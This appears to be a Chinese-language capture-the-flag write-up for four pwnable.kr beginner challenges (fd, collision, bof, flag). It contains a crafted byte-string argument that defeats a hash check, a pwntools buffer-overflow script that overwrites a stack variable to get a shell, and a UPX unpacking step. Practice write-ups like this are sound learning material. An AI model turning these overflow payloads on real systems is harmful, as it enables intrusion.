[Toddler's Bottle]

fd

Pwn:

Reason:

当fd为0的时候代表标准输入，也就是控制台，然后就可以实现buf=="LETMEWIN\n" , 编辑了一下fd.c-->命名为1.c用来测试,gcc编译指令“gcc 1.c -o 1”

#include 
#include 
#include 
char buf[32];
int main(int argc, char* argv[], char* envp[]){
	if(argc<2)
	{
		printf("pass argv[1] a number\n");
		return 0;
	}
	printf("%s %s\n",argv[0],argv[1]);
	int fd = atoi( argv[1] ) - 0x1234;
	printf("fd:%d\n",fd);
	int len = 0;
	len = read(fd, buf, 32);
	if(!strcmp("LETMEWIN\n", buf)){
		printf("good job :)\n");
		system("/bin/cat flag");
		exit(0);
	}
	printf("learn about Linux file IO\n");
	return 0;
}

本来是想直接传0x1234但是atoi后为0，看来atoi函数不支持十六进制

 

---

collision

Pwn:

col@pwnable:~$ ./col `python -c "print '\xe8\x05\xd9\x1d'+'\x01\x01\x01\x01'*4"`

Reason:

hashcode = A + B + B + B + B

 

 

 

用p32可以快速得到小端

 

---

bof

Pwn:

import pwn
# print(os.system('ls'))
col = pwn.process('./bof')
# col= pwn.remote('pwnable.kr', 9000)
payload = 'a'*0x2c+'a'*0x8+pwn.p32(0xcafebabe)
print(payload)
col.sendline(payload)
col.interactive()

Reason：

 flag

Pwn:

upx -d flag 

Reason:

https://www.cnblogs.com/zhaijiahui/p/7243735.html